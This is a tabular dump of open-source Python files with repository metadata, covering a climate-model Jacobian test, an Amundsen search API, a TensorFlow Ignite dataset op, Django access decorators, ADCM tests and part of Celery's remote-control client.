content (string, 7-928k chars) | avg_line_length (float64, 3.5-33.8k) | max_line_length (int64, 6-139k) | alphanum_fraction (float64, 0.08-0.96) | licenses (sequence) | repository_name (string, 7-104 chars) | path (string, 4-230 chars) | size (int64, 7-928k) | lang (string, 1 class)
---|---|---|---|---|---|---|---|---
'''
Copyright 2022 Airbus SAS
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import unittest
import numpy as np
import pandas as pd
from os.path import join, dirname
from pandas import DataFrame, read_csv
from scipy.interpolate import interp1d
from sos_trades_core.execution_engine.execution_engine import ExecutionEngine
from sos_trades_core.tests.core.abstract_jacobian_unit_test import AbstractJacobianUnittest
class ServicesJacobianDiscTest(AbstractJacobianUnittest):
#AbstractJacobianUnittest.DUMP_JACOBIAN = True
def setUp(self):
self.name = 'Test'
self.ee = ExecutionEngine(self.name)
self.year_start = 2020
self.year_end = 2050
self.time_step = 1
self.years = np.arange(self.year_start, self.year_end + 1, self.time_step)
self.nb_per = round((self.year_end - self.year_start) / self.time_step + 1)
# -------------------------
# input
data_dir = join(dirname(__file__), 'data')
global_data_dir = join(dirname(dirname(__file__)), 'data')
total_workforce_df = read_csv(join(data_dir, 'workingage_population_df.csv'))
total_workforce_df = total_workforce_df[total_workforce_df['years']<=self.year_end]
#multiply ageworking pop by employment rate and by % in services
workforce = total_workforce_df['population_1570']* 0.659 * 0.509
self.workforce_df = pd.DataFrame({'years': self.years, 'workforce': workforce})
#Energy_supply
brut_net = 1/1.45
share_indus = 0.37
#prepare energy df
energy_outlook = pd.DataFrame({
'year': [2010, 2017, 2018, 2025, 2030, 2035, 2040, 2050, 2060, 2100],
'energy': [149.483879, 162.7848774, 166.4685636, 180.7072889, 189.6932084, 197.8418842, 206.1201182, 220.000, 250.0, 300.0]})
f2 = interp1d(energy_outlook['year'], energy_outlook['energy'])
#Find values for 2020, 2050 and concat dfs
energy_supply = f2(np.arange(self.year_start, self.year_end+1))
energy_supply_values = energy_supply * brut_net * share_indus
energy_supply_df = pd.DataFrame({'years': self.years, 'Total production': energy_supply_values})
energy_supply_df.index = self.years
self.energy_supply_df = energy_supply_df
#energy_supply_df.loc[2020, 'Total production'] = 91.936
#Investment growth at 2%
init_value = 25
invest_serie = []
invest_serie.append(init_value)
for year in np.arange(1, self.nb_per):
invest_serie.append(invest_serie[year - 1] * 1.02)
self.total_invest = pd.DataFrame({'years': self.years, 'investment': invest_serie})
#damage
self.damage_df = pd.DataFrame({'years': self.years, 'damages': np.zeros(self.nb_per), 'damage_frac_output': np.zeros(self.nb_per),
'base_carbon_price': np.zeros(self.nb_per)})
self.damage_df.index = self.years
self.damage_df['damage_frac_output'] = 1e-2
def analytic_grad_entry(self):
return [
self.test_services_analytic_grad,
            self.test_services_withoutdamagetoproductivity
]
def test_services_analytic_grad(self):
self.model_name = 'Services'
ns_dict = {'ns_witness': f'{self.name}',
'ns_energy_mix': f'{self.name}',
'ns_public': f'{self.name}',
'ns_functions': f'{self.name}',
'ns_ref':f'{self.name}' }
self.ee.ns_manager.add_ns_def(ns_dict)
mod_path = 'climateeconomics.sos_wrapping.sos_wrapping_sectors.services.services_discipline.ServicesDiscipline'
builder = self.ee.factory.get_builder_from_module(
self.model_name, mod_path)
self.ee.factory.set_builders_to_coupling_builder(builder)
self.ee.configure()
self.ee.display_treeview_nodes()
inputs_dict = {f'{self.name}.year_start': self.year_start,
f'{self.name}.year_end': self.year_end,
f'{self.name}.time_step': self.time_step,
f'{self.name}.damage_to_productivity': True,
f'{self.name}.frac_damage_prod': 0.3,
f'{self.name}.energy_production': self.energy_supply_df,
f'{self.name}.damage_df': self.damage_df,
f'{self.name}.workforce_df': self.workforce_df,
f'{self.name}.sector_investment': self.total_invest,
f'{self.name}.alpha': 0.5
}
self.ee.load_study_from_input_dict(inputs_dict)
disc_techno = self.ee.root_process.sos_disciplines[0]
self.check_jacobian(location=dirname(__file__), filename=f'jacobian_services_discipline.pkl',
discipline=disc_techno, step=1e-15, derr_approx='complex_step',
inputs=[f'{self.name}.energy_production',
f'{self.name}.damage_df',
f'{self.name}.workforce_df',
f'{self.name}.sector_investment'],
outputs=[f'{self.name}.production_df',
f'{self.name}.capital_df',
f'{self.name}.emax_enet_constraint'])
    def test_services_withoutdamagetoproductivity(self):
self.model_name = 'Services'
ns_dict = {'ns_witness': f'{self.name}',
'ns_energy_mix': f'{self.name}',
'ns_public': f'{self.name}',
'ns_functions': f'{self.name}',
'ns_ref':f'{self.name}' }
self.ee.ns_manager.add_ns_def(ns_dict)
mod_path = 'climateeconomics.sos_wrapping.sos_wrapping_sectors.services.services_discipline.ServicesDiscipline'
builder = self.ee.factory.get_builder_from_module(
self.model_name, mod_path)
self.ee.factory.set_builders_to_coupling_builder(builder)
self.ee.configure()
self.ee.display_treeview_nodes()
inputs_dict = {f'{self.name}.year_start': self.year_start,
f'{self.name}.year_end': self.year_end,
f'{self.name}.time_step': self.time_step,
f'{self.name}.damage_to_productivity': False,
f'{self.name}.frac_damage_prod': 0.3,
f'{self.name}.energy_production': self.energy_supply_df,
f'{self.name}.damage_df': self.damage_df,
f'{self.name}.workforce_df': self.workforce_df,
f'{self.name}.sector_investment': self.total_invest,
f'{self.name}.alpha': 0.5
}
self.ee.load_study_from_input_dict(inputs_dict)
disc_techno = self.ee.root_process.sos_disciplines[0]
self.check_jacobian(location=dirname(__file__), filename=f'jacobian_services_discipline_withoutdamage.pkl',
discipline=disc_techno, step=1e-15, derr_approx='complex_step',
inputs=[f'{self.name}.energy_production',
f'{self.name}.damage_df',
f'{self.name}.workforce_df',
f'{self.name}.sector_investment'],
outputs=[f'{self.name}.production_df',
f'{self.name}.capital_df',
f'{self.name}.emax_enet_constraint'])
| 46.913793 | 138 | 0.60076 | [
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | os-climate/witness-core | climateeconomics/tests/_l1_test_gradient_services_discipline.py | 8,163 | Python |
import logging
import json
from http import HTTPStatus
from typing import Any, Dict # noqa: F401
from flask import Response, jsonify, make_response, request
from flask import current_app as app
from flask.blueprints import Blueprint
from amundsen_application.log.action_log import action_logging
from amundsen_application.api.utils.request_utils import get_query_param, request_search
from amundsen_application.api.utils.search_utils import generate_query_json, has_filters, \
map_table_result, transform_filters
from amundsen_application.models.user import load_user, dump_user
LOGGER = logging.getLogger(__name__)
REQUEST_SESSION_TIMEOUT_SEC = 3
search_blueprint = Blueprint('search', __name__, url_prefix='/explore/api/search/v0')
SEARCH_TABLE_ENDPOINT = '/search'
SEARCH_TABLE_FILTER_ENDPOINT = '/search_table'
SEARCH_USER_ENDPOINT = '/search_user'
@search_blueprint.route('/table', methods=['POST'])
def search_table() -> Response:
"""
Parse the request arguments and call the helper method to execute a table search
:return: a Response created with the results from the helper method
"""
try:
request_json = request.get_json()
search_term = get_query_param(request_json, 'term', '"term" parameter expected in request data')
page_index = get_query_param(request_json, 'pageIndex', '"pageIndex" parameter expected in request data')
search_type = request_json.get('searchType')
transformed_filters = transform_filters(filters=request_json.get('filters', {}))
results_dict = _search_table(filters=transformed_filters,
search_term=search_term,
page_index=page_index,
search_type=search_type)
return make_response(jsonify(results_dict), results_dict.get('status_code', HTTPStatus.INTERNAL_SERVER_ERROR))
except Exception as e:
message = 'Encountered exception: ' + str(e)
logging.exception(message)
        return make_response(jsonify({'msg': message}), HTTPStatus.INTERNAL_SERVER_ERROR)
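# Illustrative request body for the route above (values are made up, not taken
# from Amundsen docs): POST /explore/api/search/v0/table with JSON such as
#   {"term": "ride_events", "pageIndex": 0, "searchType": "table",
#    "filters": {"schema": "core"}}
# 'term' and 'pageIndex' are required by get_query_param; the other keys are optional.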
@action_logging
def _search_table(*, search_term: str, page_index: int, filters: Dict, search_type: str) -> Dict[str, Any]:
"""
Call the search service endpoint and return matching results
Search service logic defined here:
https://github.com/lyft/amundsensearchlibrary/blob/master/search_service/api/table.py
:return: a json output containing search results array as 'results'
"""
# Default results
tables = {
'page_index': int(page_index),
'results': [],
'total_results': 0,
}
results_dict = {
'search_term': search_term,
'msg': '',
'tables': tables,
}
try:
if has_filters(filters=filters):
query_json = generate_query_json(filters=filters, page_index=page_index, search_term=search_term)
url_base = app.config['SEARCHSERVICE_BASE'] + SEARCH_TABLE_FILTER_ENDPOINT
response = request_search(url=url_base,
headers={'Content-Type': 'application/json'},
method='POST',
data=json.dumps(query_json))
else:
url_base = app.config['SEARCHSERVICE_BASE'] + SEARCH_TABLE_ENDPOINT
url = f'{url_base}?query_term={search_term}&page_index={page_index}'
response = request_search(url=url)
status_code = response.status_code
if status_code == HTTPStatus.OK:
results_dict['msg'] = 'Success'
results = response.json().get('results')
tables['results'] = [map_table_result(result) for result in results]
tables['total_results'] = response.json().get('total_results')
else:
message = 'Encountered error: Search request failed'
results_dict['msg'] = message
logging.error(message)
results_dict['status_code'] = status_code
return results_dict
except Exception as e:
message = 'Encountered exception: ' + str(e)
results_dict['msg'] = message
logging.exception(message)
return results_dict
@search_blueprint.route('/user', methods=['GET'])
def search_user() -> Response:
"""
Parse the request arguments and call the helper method to execute a user search
:return: a Response created with the results from the helper method
"""
try:
search_term = get_query_param(request.args, 'query', 'Endpoint takes a "query" parameter')
page_index = get_query_param(request.args, 'page_index', 'Endpoint takes a "page_index" parameter')
search_type = request.args.get('search_type')
results_dict = _search_user(search_term=search_term, page_index=page_index, search_type=search_type)
return make_response(jsonify(results_dict), results_dict.get('status_code', HTTPStatus.INTERNAL_SERVER_ERROR))
except Exception as e:
message = 'Encountered exception: ' + str(e)
logging.exception(message)
        return make_response(jsonify({'msg': message}), HTTPStatus.INTERNAL_SERVER_ERROR)
@action_logging
def _search_user(*, search_term: str, page_index: int, search_type: str) -> Dict[str, Any]:
"""
Call the search service endpoint and return matching results
Search service logic defined here:
https://github.com/lyft/amundsensearchlibrary/blob/master/search_service/api/user.py
:return: a json output containing search results array as 'results'
"""
def _map_user_result(result: Dict) -> Dict:
user_result = dump_user(load_user(result))
user_result['type'] = 'user'
return user_result
users = {
'page_index': int(page_index),
'results': [],
'total_results': 0,
}
results_dict = {
'search_term': search_term,
'msg': 'Success',
'status_code': HTTPStatus.OK,
'users': users,
}
try:
url = '{0}?query_term={1}&page_index={2}'.format(app.config['SEARCHSERVICE_BASE'] + SEARCH_USER_ENDPOINT,
search_term,
page_index)
response = request_search(url=url)
status_code = response.status_code
if status_code == HTTPStatus.OK:
results_dict['msg'] = 'Success'
results = response.json().get('results')
users['results'] = [_map_user_result(result) for result in results]
users['total_results'] = response.json().get('total_results')
else:
message = 'Encountered error: Search request failed'
results_dict['msg'] = message
logging.error(message)
results_dict['status_code'] = status_code
return results_dict
except Exception as e:
message = 'Encountered exception: ' + str(e)
results_dict['msg'] = message
results_dict['status_code'] = HTTPStatus.INTERNAL_SERVER_ERROR
logging.exception(message)
return results_dict
# TODO - Implement
def _search_dashboard(*, search_term: str, page_index: int, filters: Dict, search_type: str) -> Dict[str, Any]:
return {}
| 38.389474 | 118 | 0.656019 | [
"Apache-2.0"
] | ai-platform/amundsenfrontendlibrary | amundsen_application/api/search/v0.py | 7,294 | Python |
"""Python wrappers around TensorFlow ops.
This file is MACHINE GENERATED! Do not edit.
Original C++ source file: gen_dataset_ops.cc
"""
import collections as _collections
import six as _six
from tensorflow.python import pywrap_tensorflow as _pywrap_tensorflow
from tensorflow.python.eager import context as _context
from tensorflow.python.eager import core as _core
from tensorflow.python.eager import execute as _execute
from tensorflow.python.framework import dtypes as _dtypes
from tensorflow.python.framework import errors as _errors
from tensorflow.python.framework import tensor_shape as _tensor_shape
from tensorflow.core.framework import op_def_pb2 as _op_def_pb2
# Needed to trigger the call to _set_call_cpp_shape_fn.
from tensorflow.python.framework import common_shapes as _common_shapes
from tensorflow.python.framework import op_def_registry as _op_def_registry
from tensorflow.python.framework import ops as _ops
from tensorflow.python.framework import op_def_library as _op_def_library
from tensorflow.python.util.deprecation import deprecated_endpoints
from tensorflow.python.util import dispatch as _dispatch
from tensorflow.python.util.tf_export import tf_export
from tensorflow.python.util.tf_export import kwarg_only as _kwarg_only
from tensorflow.tools.docs import doc_controls as _doc_controls
@_dispatch.add_dispatch_list
@tf_export('ignite_dataset')
def ignite_dataset(cache_name, host, port, local, part, page_size, schema, permutation, name=None):
r"""IgniteDataset that allows to get data from Apache Ignite.
Apache Ignite is a memory-centric distributed database, caching, and processing
platform for transactional, analytical, and streaming workloads, delivering
in-memory speeds at petabyte scale. This contrib package contains an
integration between Apache Ignite and TensorFlow. The integration is based on
tf.data from TensorFlow side and Binary Client Protocol from Apache Ignite side.
    It allows Apache Ignite to be used as a data source for neural network training,
inference and all other computations supported by TensorFlow. Ignite Dataset
is based on Apache Ignite Binary Client Protocol.
Args:
cache_name: A `Tensor` of type `string`. Ignite Cache Name.
host: A `Tensor` of type `string`. Ignite Thin Client Host.
port: A `Tensor` of type `int32`. Ignite Thin Client Port.
local: A `Tensor` of type `bool`.
Local flag that defines that data should be fetched from local host only.
part: A `Tensor` of type `int32`. Partition data should be fetched from.
page_size: A `Tensor` of type `int32`. Page size for Ignite Thin Client.
schema: A `Tensor` of type `int32`.
Internal structure that defines schema of cache objects.
permutation: A `Tensor` of type `int32`.
Internal structure that defines permutation of cache objects.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `variant`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name,
"IgniteDataset", name, _ctx.post_execution_callbacks, cache_name,
host, port, local, part, page_size, schema, permutation)
return _result
except _core._FallbackException:
try:
return ignite_dataset_eager_fallback(
cache_name, host, port, local, part, page_size, schema,
permutation, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except (TypeError, ValueError):
result = _dispatch.dispatch(
ignite_dataset, cache_name=cache_name, host=host, port=port,
local=local, part=part, page_size=page_size,
schema=schema, permutation=permutation,
name=name)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
try:
_, _, _op = _op_def_lib._apply_op_helper(
"IgniteDataset", cache_name=cache_name, host=host, port=port,
local=local, part=part, page_size=page_size,
schema=schema, permutation=permutation, name=name)
except (TypeError, ValueError):
result = _dispatch.dispatch(
ignite_dataset, cache_name=cache_name, host=host, port=port,
local=local, part=part, page_size=page_size,
schema=schema, permutation=permutation, name=name)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = None
_execute.record_gradient(
"IgniteDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
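# Illustrative call of the raw op above (all values are placeholders, not taken
# from the original file); string/bool/int32 arguments are converted to tensors
# and the op returns a DT_VARIANT dataset handle:
#   handle = ignite_dataset(cache_name="KITTEN_CACHE", host="localhost",
#                           port=10800, local=False, part=-1, page_size=100,
#                           schema=schema_ints, permutation=permutation_ints)
# where schema_ints and permutation_ints stand for the internal int32 structures
# described in the docstring.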
def IgniteDataset(cache_name, host, port, local, part, page_size, schema, permutation, name=None):
return ignite_dataset(cache_name=cache_name, host=host, port=port, local=local, part=part, page_size=page_size, schema=schema, permutation=permutation, name=name)
IgniteDataset.__doc__ = ignite_dataset.__doc__
IgniteDataset = _doc_controls.do_not_generate_docs(_kwarg_only(IgniteDataset))
tf_export("raw_ops.IgniteDataset")(IgniteDataset)
def ignite_dataset_eager_fallback(cache_name, host, port, local, part, page_size, schema, permutation, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function ignite_dataset
"""
_ctx = ctx if ctx else _context.context()
cache_name = _ops.convert_to_tensor(cache_name, _dtypes.string)
host = _ops.convert_to_tensor(host, _dtypes.string)
port = _ops.convert_to_tensor(port, _dtypes.int32)
local = _ops.convert_to_tensor(local, _dtypes.bool)
part = _ops.convert_to_tensor(part, _dtypes.int32)
page_size = _ops.convert_to_tensor(page_size, _dtypes.int32)
schema = _ops.convert_to_tensor(schema, _dtypes.int32)
permutation = _ops.convert_to_tensor(permutation, _dtypes.int32)
_inputs_flat = [cache_name, host, port, local, part, page_size, schema, permutation]
_attrs = None
_result = _execute.execute(b"IgniteDataset", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=_ctx, name=name)
_execute.record_gradient(
"IgniteDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
_ops.RegisterShape("IgniteDataset")(None)
def _InitOpDefLibrary(op_list_proto_bytes):
op_list = _op_def_pb2.OpList()
op_list.ParseFromString(op_list_proto_bytes)
_op_def_registry.register_op_list(op_list)
op_def_lib = _op_def_library.OpDefLibrary()
op_def_lib.add_op_list(op_list)
return op_def_lib
# op {
# name: "IgniteDataset"
# input_arg {
# name: "cache_name"
# type: DT_STRING
# }
# input_arg {
# name: "host"
# type: DT_STRING
# }
# input_arg {
# name: "port"
# type: DT_INT32
# }
# input_arg {
# name: "local"
# type: DT_BOOL
# }
# input_arg {
# name: "part"
# type: DT_INT32
# }
# input_arg {
# name: "page_size"
# type: DT_INT32
# }
# input_arg {
# name: "schema"
# type: DT_INT32
# }
# input_arg {
# name: "permutation"
# type: DT_INT32
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# is_stateful: true
# }
_op_def_lib = _InitOpDefLibrary(b"\n\203\001\n\rIgniteDataset\022\016\n\ncache_name\030\007\022\010\n\004host\030\007\022\010\n\004port\030\003\022\t\n\005local\030\n\022\010\n\004part\030\003\022\r\n\tpage_size\030\003\022\n\n\006schema\030\003\022\017\n\013permutation\030\003\032\n\n\006handle\030\025\210\001\001")
| 41.46114 | 318 | 0.724694 | [
"MIT"
] | aMp37/SimpleHTR | venv/lib/python3.7/site-packages/tensorflow_core/contrib/ignite/python/ops/gen_dataset_ops.py | 8,002 | Python |
import os
from typing import List
project_dir = os.path.abspath(os.path.dirname(__file__))
c_file_suffix = ('.c', '.cc', '.cpp')
def read_file(file_name: str) -> List[str]:
    with open(file_name, 'r') as _f:
        return _f.readlines()
| 20.384615 | 56 | 0.65283 | [
"MIT"
] | whbjzzwjxq/llvm-ir2json | utils.py | 265 | Python |
import functools
from django import http
from django.shortcuts import get_object_or_404, redirect
from conference import models, settings
def speaker_access(f): # pragma: no cover
"""
Decorator that protects the view relative to a speaker.
"""
@functools.wraps(f)
def wrapper(request, slug, **kwargs):
spk = get_object_or_404(models.Speaker, slug=slug)
if request.user.is_staff or request.user == spk.user:
full_access = True
talks = spk.talks()
else:
full_access = False
conf = models.Conference.objects.current()
if settings.VOTING_OPENED(conf, request.user):
if settings.VOTING_ALLOWED(request.user):
talks = spk.talks()
else:
if settings.VOTING_DISALLOWED:
return redirect(settings.VOTING_DISALLOWED)
else:
raise http.Http404()
else:
talks = spk.talks(status='accepted')
if talks.count() == 0:
raise http.Http404()
return f(request, slug, speaker=spk, talks=talks, full_access=full_access, **kwargs)
return wrapper
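# Usage sketch (hypothetical view, not part of this module): the decorator
# resolves the speaker from the slug and injects extra keyword arguments.
#   @speaker_access
#   def speaker_page(request, slug, speaker, talks, full_access):
#       ...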
def talk_access(f): # pragma: no cover
"""
Decorator that protects the view relative to a talk.
"""
@functools.wraps(f)
def wrapper(request, slug, **kwargs):
tlk = get_object_or_404(models.Talk, slug=slug)
if request.user.is_anonymous():
full_access = False
elif request.user.is_staff:
full_access = True
else:
try:
tlk.get_all_speakers().get(user__id=request.user.id)
except (models.Speaker.DoesNotExist, models.Speaker.MultipleObjectsReturned):
# The MultipleObjectsReturned can happen if the user is not logged on and .id is None
full_access = False
else:
full_access = True
        # if the talk is unconfirmed, access is granted to:
        # * superusers or speakers (full_access = True)
        # * users allowed to vote, while community voting is in progress
if tlk.status == 'proposed' and not full_access:
conf = models.Conference.objects.current()
if not settings.VOTING_OPENED(conf, request.user):
return http.HttpResponseForbidden()
if not settings.VOTING_ALLOWED(request.user):
if settings.VOTING_DISALLOWED:
return redirect(settings.VOTING_DISALLOWED)
else:
return http.HttpResponseForbidden()
return f(request, slug, talk=tlk, full_access=full_access, **kwargs)
return wrapper
def profile_access(f): # pragma: no cover
"""
    Decorator that protects the view relative to a profile.
"""
@functools.wraps(f)
def wrapper(request, slug, **kwargs):
try:
profile = models.AttendeeProfile.objects\
.select_related('user')\
.get(slug=slug)
except models.AttendeeProfile.DoesNotExist:
raise http.Http404()
if request.user.is_staff or request.user == profile.user:
full_access = True
else:
full_access = False
            # a profile belonging to a speaker with an accepted talk is visible
            # regardless of the profile's own visibility setting.
accepted = models.TalkSpeaker.objects\
.filter(speaker__user=profile.user)\
.filter(talk__status='accepted')\
.count()
if not accepted:
                # if community voting is open and the profile belongs to a speaker
                # with a talk in the running, the page is visible
conf = models.Conference.objects.current()
if not (settings.VOTING_OPENED(conf, request.user) and settings.VOTING_ALLOWED(request.user)):
if profile.visibility == 'x':
return http.HttpResponseForbidden()
elif profile.visibility == 'm' and request.user.is_anonymous():
return http.HttpResponseForbidden()
return f(request, slug, profile=profile, full_access=full_access, **kwargs)
return wrapper | 39.706422 | 110 | 0.588031 | [
"BSD-2-Clause"
] | cezar77/epcon | conference/decorators.py | 4,328 | Python |
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import allure
import coreapi
import pytest
from adcm_client.base import ActionHasIssues
from adcm_client.objects import ADCMClient
from adcm_pytest_plugin import utils
from tests.library.errorcodes import UPGRADE_ERROR
def test_action_should_not_be_run_while_cluster_has_an_issue(sdk_client_fs: ADCMClient):
bundle_path = utils.get_data_dir(__file__, "cluster")
bundle = sdk_client_fs.upload_from_fs(bundle_path)
cluster = bundle.cluster_create(name=utils.random_string())
with allure.step(f"Run action with error for cluster {cluster.name}"):
with pytest.raises(ActionHasIssues):
cluster.action(name="install").run()
def test_action_should_not_be_run_while_host_has_an_issue(sdk_client_fs: ADCMClient):
bundle_path = utils.get_data_dir(__file__, "host")
bundle = sdk_client_fs.upload_from_fs(bundle_path)
provider = bundle.provider_create(name=utils.random_string())
host = provider.host_create(fqdn=utils.random_string())
with allure.step(f"Run action with error for host {host.fqdn}"):
with pytest.raises(ActionHasIssues):
host.action(name="install").run()
def test_action_should_not_be_run_while_hostprovider_has_an_issue(
sdk_client_fs: ADCMClient,
):
bundle_path = utils.get_data_dir(__file__, "provider")
bundle = sdk_client_fs.upload_from_fs(bundle_path)
provider = bundle.provider_create(name=utils.random_string())
with allure.step(f"Run action with error for provider {provider.name}"):
with pytest.raises(ActionHasIssues):
provider.action(name="install").run()
def test_when_cluster_has_issue_than_upgrade_locked(sdk_client_fs: ADCMClient):
with allure.step("Create cluster and upload new one bundle"):
old_bundle_path = utils.get_data_dir(__file__, "cluster")
new_bundle_path = utils.get_data_dir(__file__, "upgrade", "cluster")
old_bundle = sdk_client_fs.upload_from_fs(old_bundle_path)
cluster = old_bundle.cluster_create(name=utils.random_string())
sdk_client_fs.upload_from_fs(new_bundle_path)
with allure.step("Upgrade cluster"):
with pytest.raises(coreapi.exceptions.ErrorMessage) as e:
cluster.upgrade().do()
with allure.step("Check if cluster has issues"):
UPGRADE_ERROR.equal(e, "cluster ", " has issue: ")
def test_when_hostprovider_has_issue_than_upgrade_locked(sdk_client_fs: ADCMClient):
with allure.step("Create hostprovider"):
old_bundle_path = utils.get_data_dir(__file__, "provider")
new_bundle_path = utils.get_data_dir(__file__, "upgrade", "provider")
old_bundle = sdk_client_fs.upload_from_fs(old_bundle_path)
provider = old_bundle.provider_create(name=utils.random_string())
sdk_client_fs.upload_from_fs(new_bundle_path)
with allure.step("Upgrade provider"):
with pytest.raises(coreapi.exceptions.ErrorMessage) as e:
provider.upgrade().do()
with allure.step("Check if upgrade locked"):
UPGRADE_ERROR.equal(e)
@allure.link("https://jira.arenadata.io/browse/ADCM-487")
def test_when_component_has_no_constraint_then_cluster_doesnt_have_issues(
sdk_client_fs: ADCMClient,
):
with allure.step("Create cluster (component has no constraint)"):
bundle_path = utils.get_data_dir(__file__, "cluster_component_hasnt_constraint")
bundle = sdk_client_fs.upload_from_fs(bundle_path)
cluster = bundle.cluster_create(name=utils.random_string())
cluster.service_add()
with allure.step("Run action: lock cluster"):
cluster.action(name="lock-cluster").run().try_wait()
with allure.step("Check if state is always-locked"):
cluster.reread()
assert cluster.state == "always-locked"
| 45.242105 | 88 | 0.746626 | [
"Apache-2.0"
] | AKhodus/adcm | tests/functional/test_objects_issues.py | 4,298 | Python |
# -*- coding: utf-8 -*-
"""Worker Remote Control Client.
Client for worker remote control commands.
Server implementation is in :mod:`celery.worker.control`.
"""
from __future__ import absolute_import, unicode_literals
import warnings
from billiard.common import TERM_SIGNAME
from kombu.matcher import match
from kombu.pidbox import Mailbox
from kombu.utils.compat import register_after_fork
from kombu.utils.functional import lazy
from kombu.utils.objects import cached_property
from celery.exceptions import DuplicateNodenameWarning
from celery.five import items
from celery.utils.log import get_logger
from celery.utils.text import pluralize
__all__ = ('Inspect', 'Control', 'flatten_reply')
logger = get_logger(__name__)
W_DUPNODE = """\
Received multiple replies from node {0}: {1}.
Please make sure you give each node a unique nodename using
the celery worker `-n` option.\
"""
def flatten_reply(reply):
"""Flatten node replies.
Convert from a list of replies in this format::
[{'[email protected]': reply},
{'[email protected]': reply}]
into this format::
{'[email protected]': reply,
'[email protected]': reply}
"""
nodes, dupes = {}, set()
for item in reply:
[dupes.add(name) for name in item if name in nodes]
nodes.update(item)
if dupes:
warnings.warn(DuplicateNodenameWarning(
W_DUPNODE.format(
pluralize(len(dupes), 'name'), ', '.join(sorted(dupes)),
),
))
return nodes
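# Doctest-style illustration of the reshaping documented above (node names and
# replies are made up):
#   >>> flatten_reply([{'[email protected]': {'ok': 'pong'}},
#   ...                {'[email protected]': {'ok': 'pong'}}])
#   {'[email protected]': {'ok': 'pong'}, '[email protected]': {'ok': 'pong'}}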
def _after_fork_cleanup_control(control):
try:
control._after_fork()
except Exception as exc: # pylint: disable=broad-except
logger.info('after fork raised exception: %r', exc, exc_info=1)
class Inspect(object):
"""API for app.control.inspect."""
app = None
def __init__(self, destination=None, timeout=1.0, callback=None,
connection=None, app=None, limit=None, pattern=None,
matcher=None):
self.app = app or self.app
self.destination = destination
self.timeout = timeout
self.callback = callback
self.connection = connection
self.limit = limit
self.pattern = pattern
self.matcher = matcher
def _prepare(self, reply):
if reply:
by_node = flatten_reply(reply)
if (self.destination and
not isinstance(self.destination, (list, tuple))):
return by_node.get(self.destination)
if self.pattern:
pattern = self.pattern
matcher = self.matcher
return {node: reply for node, reply in items(by_node)
if match(node, pattern, matcher)}
return by_node
def _request(self, command, **kwargs):
return self._prepare(self.app.control.broadcast(
command,
arguments=kwargs,
destination=self.destination,
callback=self.callback,
connection=self.connection,
limit=self.limit,
timeout=self.timeout, reply=True,
pattern=self.pattern, matcher=self.matcher,
))
def report(self):
return self._request('report')
def clock(self):
return self._request('clock')
def active(self, safe=None):
# safe is ignored since 4.0
# as no objects will need serialization now that we
# have argsrepr/kwargsrepr.
return self._request('active')
def scheduled(self, safe=None):
return self._request('scheduled')
def reserved(self, safe=None):
return self._request('reserved')
def stats(self):
return self._request('stats')
def revoked(self):
return self._request('revoked')
def registered(self, *taskinfoitems):
return self._request('registered', taskinfoitems=taskinfoitems)
registered_tasks = registered
def ping(self, destination=None):
return self._request('ping')
def active_queues(self):
return self._request('active_queues')
def query_task(self, *ids):
# signature used be unary: query_task(ids=[id1, id2])
# we need this to preserve backward compatibility.
if len(ids) == 1 and isinstance(ids[0], (list, tuple)):
ids = ids[0]
return self._request('query_task', ids=ids)
def conf(self, with_defaults=False):
return self._request('conf', with_defaults=with_defaults)
def hello(self, from_node, revoked=None):
return self._request('hello', from_node=from_node, revoked=revoked)
def memsample(self):
return self._request('memsample')
def memdump(self, samples=10):
return self._request('memdump', samples=samples)
def objgraph(self, type='Request', n=200, max_depth=10):
return self._request('objgraph', num=n, max_depth=max_depth, type=type)
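# Usage sketch (standard Celery API; host names are placeholders): an Inspect
# instance is normally obtained via ``app.control.inspect()`` and then queried:
#   insp = app.control.inspect(['[email protected]'])
#   insp.ping(); insp.active(); insp.registered()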
class Control(object):
"""Worker remote control client."""
Mailbox = Mailbox
def __init__(self, app=None):
self.app = app
self.mailbox = self.Mailbox(
app.conf.control_exchange,
type='fanout',
accept=['json'],
producer_pool=lazy(lambda: self.app.amqp.producer_pool),
queue_ttl=app.conf.control_queue_ttl,
reply_queue_ttl=app.conf.control_queue_ttl,
queue_expires=app.conf.control_queue_expires,
reply_queue_expires=app.conf.control_queue_expires,
)
register_after_fork(self, _after_fork_cleanup_control)
def _after_fork(self):
del self.mailbox.producer_pool
@cached_property
def inspect(self):
return self.app.subclass_with_self(Inspect, reverse='control.inspect')
def purge(self, connection=None):
"""Discard all waiting tasks.
This will ignore all tasks waiting for execution, and they will
be deleted from the messaging server.
Arguments:
connection (kombu.Connection): Optional specific connection
instance to use. If not provided a connection will
be acquired from the connection pool.
Returns:
int: the number of tasks discarded.
"""
with self.app.connection_or_acquire(connection) as conn:
